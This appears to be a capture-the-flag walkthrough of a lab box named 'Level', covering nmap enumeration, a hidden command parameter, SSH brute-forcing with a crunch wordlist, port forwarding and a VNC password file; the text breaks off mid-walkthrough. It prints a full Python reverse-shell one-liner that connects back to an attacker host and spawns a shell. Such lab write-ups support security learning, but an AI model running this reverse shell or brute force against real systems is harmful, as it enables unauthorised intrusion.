This is a medium level box which I found on this platform and it’s a great box that teaches you about vnc protocol .
NMAP
Nmap scan report for 192.168.1.106 [29/61]
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
65000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e0:e7:a1:e4:f8:6f:ce:9f:e5:b8:61:a0:83:e8:e4:77 (RSA)
| 256 69:6a:91:6b:bb:bf:60:55:dc:a3:0b:8f:53:b7:83:7b (ECDSA)
|_ 256 8e:92:3d:35:d2:25:4e:e2:f4:1e:21:70:56:56:94:e4 (ED25519)
MAC Address: 08:00:27:8C:C8:F1 (Oracle VirtualBox virtual NIC) [0/61]
Service Info: Host: LEVEL; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: 0s
|_nbstat: NetBIOS name: LEVEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: level
| NetBIOS computer name: LEVEL\x00
| Domain name: \x00
| FQDN: level
|_ System time: 2021-01-09T18:41:01+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-09T17:41:01
|_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds
PORT 21 (FTP)
There wasn’t anything on ftp server.
PORT 139/445 (SMB)
There weren’t any share that we could access as anonymous
Running enum4-linux-ng I found one user by the name of one
PORT 80
Looking at robots.txt
We saw these directories but they were not on the box but if we scroll down a bit we will find a text written in brainfuck
Visting this directory it will give us a sort of wordlist
Using this wordlists we found a directorty
But still we need to enumerate more
I ran the wordlist on directory Level2021
But found a static message, I just made a guess about having cmd paramter and I was right
To get a reverse shell I used the python rev shell payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Then I found a hint in the /home directory
################################################
# #
# changing "x" to "number" can be a great idea #
# #
# one:0n30n3xxx #
# #
################################################I tried guessing the password with
0n30n3111 and 0n30n30n3 but failed.
I ran linpeas and the only thing I could dig out was the open that was open to only localhost
So we can do ssh port forwarding but for that we need a valid password for the user one so going back to .one_secret.txt we may need to craf a wordlist of password with 0n30n3xxx, where xxx will be the random numbers.
I used crunch to make wordlist of the pattern knowing the length of the password which is 9
Then use this wordlist to bruteforce against ssh with the user name one
Lets connect to port 5901 with netcat
Searching this on goolge results in something to do with vnc (virtual networking computing) which is for remote access to a computer similar to windows RDP.
Here RFB 003.008 means remote port is a VNC server and up.Now in order to acess this port we need to do ssh port forwarding.
Now if we go to our browser using localhost:5901 we will get this result
In order to connect to vnc we need a password , by default it is saved in $HOME/.vnc/passwd but in this case it isn’t configured to be saved there so we may need to find the password file on the target machine.
In one's directory we can see ... which is a folder
Here remote_level is the encrypted password file for connecting to vnc
